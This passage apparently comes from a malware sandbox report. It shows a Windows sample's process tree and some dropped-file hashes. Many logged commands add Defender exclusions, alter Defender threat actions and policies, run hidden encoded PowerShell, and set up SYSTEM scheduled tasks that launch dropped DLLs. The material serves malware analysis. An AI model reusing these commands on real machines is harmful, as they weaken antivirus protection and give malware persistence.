                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aUtBPNtPIEfbItvst" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:916
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VemQCkOhwRjHyFqD" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:2236
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VemQCkOhwRjHyFqD" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:2644
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AfQFmMtUU" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:868
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AfQFmMtUU" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                                PID:2364
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LSPuJNxSevMsC" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                  PID:2000
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LSPuJNxSevMsC" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                    PID:1584
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XTIErcVviYlSEsscsXR" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1072
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XTIErcVviYlSEsscsXR" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                      PID:2180
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XuYvvRlLgmUn" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:2720
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XuYvvRlLgmUn" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                          PID:1912
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\enDWjyqEZhNU2" /t REG_DWORD /d 0 /reg:32
                                                          4⤵
                                                            PID:2840
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\enDWjyqEZhNU2" /t REG_DWORD /d 0 /reg:64
                                                            4⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2876
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\qDoHUGiKOnuwyvVB" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2632
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\qDoHUGiKOnuwyvVB" /t REG_DWORD /d 0 /reg:64
                                                            4⤵
                                                              PID:2844
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                                PID:2552
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                  PID:996
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aUtBPNtPIEfbItvst" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2804
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aUtBPNtPIEfbItvst" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:2604
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VemQCkOhwRjHyFqD" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                      PID:2964
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VemQCkOhwRjHyFqD" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:3020
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /CREATE /TN "gWKHFRZAU" /SC once /ST 14:44:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                    3⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Scheduled Task/Job: Scheduled Task
                                                                    PID:1216
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /run /I /tn "gWKHFRZAU"
                                                                    3⤵
                                                                      PID:2796
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /DELETE /F /TN "gWKHFRZAU"
                                                                      3⤵
                                                                        PID:924
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                        3⤵
                                                                          PID:2900
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                            4⤵
                                                                              PID:2952
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:2272
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                              4⤵
                                                                                PID:448
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              schtasks /CREATE /TN "mmcKQTFpdsyEWxyLI" /SC once /ST 20:16:12 /RU "SYSTEM" /TR "\"C:\Windows\Temp\VemQCkOhwRjHyFqD\XOrVWsCSJcOURFj\ZbXvqRx.exe\" pi /kXQzdidaa 525403 /S" /V1 /F
                                                                              3⤵
                                                                              • Drops file in Windows directory
                                                                              • Scheduled Task/Job: Scheduled Task
                                                                              PID:408
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              schtasks /run /I /tn "mmcKQTFpdsyEWxyLI"
                                                                              3⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:2136
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 632
                                                                              3⤵
                                                                              • Loads dropped DLL
                                                                              • Program crash
                                                                              PID:2512
                                                                          • C:\Windows\Temp\VemQCkOhwRjHyFqD\XOrVWsCSJcOURFj\ZbXvqRx.exe
                                                                            C:\Windows\Temp\VemQCkOhwRjHyFqD\XOrVWsCSJcOURFj\ZbXvqRx.exe pi /kXQzdidaa 525403 /S
                                                                            2⤵
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            • Drops Chrome extension
                                                                            • Drops file in System32 directory
                                                                            • Drops file in Program Files directory
                                                                            • Modifies data under HKEY_USERS
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:1740
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                              3⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1816
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                4⤵
                                                                                • Indirect Command Execution
                                                                                PID:1048
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                  5⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:1128
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                    6⤵
                                                                                      PID:2560
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                  4⤵
                                                                                  • Indirect Command Execution
                                                                                  PID:400
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                    5⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:1436
                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                      6⤵
                                                                                        PID:1480
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                    4⤵
                                                                                    • Indirect Command Execution
                                                                                    PID:584
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                      5⤵
                                                                                        PID:1648
                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                          6⤵
                                                                                            PID:1312
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                        4⤵
                                                                                        • Indirect Command Execution
                                                                                        PID:2204
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                          5⤵
                                                                                            PID:1264
                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                              6⤵
                                                                                                PID:2464
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                            4⤵
                                                                                            • Indirect Command Execution
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:860
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                              5⤵
                                                                                                PID:1556
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                  6⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Drops file in System32 directory
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1476
                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                    7⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:2252
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /DELETE /F /TN "bJaUjLwxLUDwMvBjjy"
                                                                                            3⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1760
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                            3⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1204
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                              4⤵
                                                                                              • Indirect Command Execution
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:868
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                5⤵
                                                                                                  PID:972
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                    6⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Drops file in System32 directory
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2364
                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      7⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2000
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                4⤵
                                                                                                • Indirect Command Execution
                                                                                                PID:2716
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                  5⤵
                                                                                                    PID:2460
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                      6⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2720
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                        7⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2760
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\AfQFmMtUU\QqXCEg.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "PWWBhyALfcSbedp" /V1 /F
                                                                                                3⤵
                                                                                                • Drops file in Windows directory
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:2644
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "PWWBhyALfcSbedp2" /F /xml "C:\Program Files (x86)\AfQFmMtUU\UwQZwLq.xml" /RU "SYSTEM"
                                                                                                3⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:992
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /END /TN "PWWBhyALfcSbedp"
                                                                                                3⤵
                                                                                                  PID:2440
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /DELETE /F /TN "PWWBhyALfcSbedp"
                                                                                                  3⤵
                                                                                                    PID:1548
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "RprkBAAFxCYqMr" /F /xml "C:\Program Files (x86)\enDWjyqEZhNU2\JzDEUYo.xml" /RU "SYSTEM"
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:2396
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "isOwubXyPbRIa2" /F /xml "C:\ProgramData\qDoHUGiKOnuwyvVB\Vdyseue.xml" /RU "SYSTEM"
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:2144
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "ZPzYZUwOurxmvkKKy2" /F /xml "C:\Program Files (x86)\XTIErcVviYlSEsscsXR\zShRMUa.xml" /RU "SYSTEM"
                                                                                                    3⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:1676
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "gtjPvKPVMNaEWIYZSDJ2" /F /xml "C:\Program Files (x86)\LSPuJNxSevMsC\jkvOXBg.xml" /RU "SYSTEM"
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:2248
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "ALUoYMkKWcUKdiGlz" /SC once /ST 12:09:08 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\VemQCkOhwRjHyFqD\rYWYfoQJ\xfTsuCE.dll\",#1 /orlSdidNIf 525403" /V1 /F
                                                                                                    3⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:2360
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /run /I /tn "ALUoYMkKWcUKdiGlz"
                                                                                                    3⤵
                                                                                                      PID:2352
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /DELETE /F /TN "mmcKQTFpdsyEWxyLI"
                                                                                                      3⤵
                                                                                                        PID:1716
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 1552
                                                                                                        3⤵
                                                                                                        • Loads dropped DLL
                                                                                                        • Program crash
                                                                                                        PID:2476
                                                                                                    • C:\Windows\system32\rundll32.EXE
                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\VemQCkOhwRjHyFqD\rYWYfoQJ\xfTsuCE.dll",#1 /orlSdidNIf 525403
                                                                                                      2⤵
                                                                                                        PID:2748
                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\VemQCkOhwRjHyFqD\rYWYfoQJ\xfTsuCE.dll",#1 /orlSdidNIf 525403
                                                                                                          3⤵
                                                                                                          • Blocklisted process makes network request
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Loads dropped DLL
                                                                                                          • Drops file in System32 directory
                                                                                                          • Enumerates system info in registry
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:828
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /DELETE /F /TN "ALUoYMkKWcUKdiGlz"
                                                                                                            4⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:2096
                                                                                                    • C:\Windows\system32\taskeng.exe
                                                                                                      taskeng.exe {63486DCC-B33C-4F17-A04A-8221577C1367} S-1-5-21-2172136094-3310281978-782691160-1000:EXCFTDUU\Admin:Interactive:[1]
                                                                                                      1⤵
                                                                                                        PID:1124
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                          2⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Drops file in System32 directory
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:1760
                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                            3⤵
                                                                                                              PID:1536
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                            2⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Drops file in System32 directory
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:2836
                                                                                                            • C:\Windows\system32\gpupdate.exe
                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                              3⤵
                                                                                                                PID:2032
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                              2⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • Drops file in System32 directory
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:1984
                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                3⤵
                                                                                                                  PID:2080
                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                              1⤵
                                                                                                                PID:756
                                                                                                              • C:\Windows\system32\gpscript.exe
                                                                                                                gpscript.exe /RefreshSystemParam
                                                                                                                1⤵
                                                                                                                  PID:2404
                                                                                                                • C:\Windows\system32\gpscript.exe
                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                  1⤵
                                                                                                                    PID:2976

                                                                                                                  Network

                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                        Replay Monitor

                                                                                                                        Loading Replay Monitor...

                                                                                                                        Downloads

                                                                                                                        • C:\Program Files (x86)\AfQFmMtUU\UwQZwLq.xml

                                                                                                                          Filesize

                                                                                                                          2KB

                                                                                                                          MD5

                                                                                                                          99836ceee4ffa7932161179316437d89

                                                                                                                          SHA1

                                                                                                                          6c38ece5740d8f0f99c2edd0ce2cb62bbe50d70c

                                                                                                                          SHA256

                                                                                                                          7451c8d3d76ae8114464a8c789b04a511b7450c55297ef9bade6fb6cea35a7ee

                                                                                                                          SHA512

                                                                                                                          9a7bb859a4260adaa5ec11a131b4bf201d1606f5bed9338161952ce8f555a7122d097f5e3912970d78273665835019e91524d21d1d29d3c9c7f6daff1d41fcdc

                                                                                                                        • C:\Program Files (x86)\LSPuJNxSevMsC\jkvOXBg.xml

                                                                                                                          Filesize

                                                                                                                          2KB

                                                                                                                          MD5

                                                                                                                          ff68636b0a7d1e535ecc0d1eb37f24cd

                                                                                                                          SHA1

                                                                                                                          709133b40083a6e90832fccc9461c3ff8a199f11

                                                                                                                          SHA256

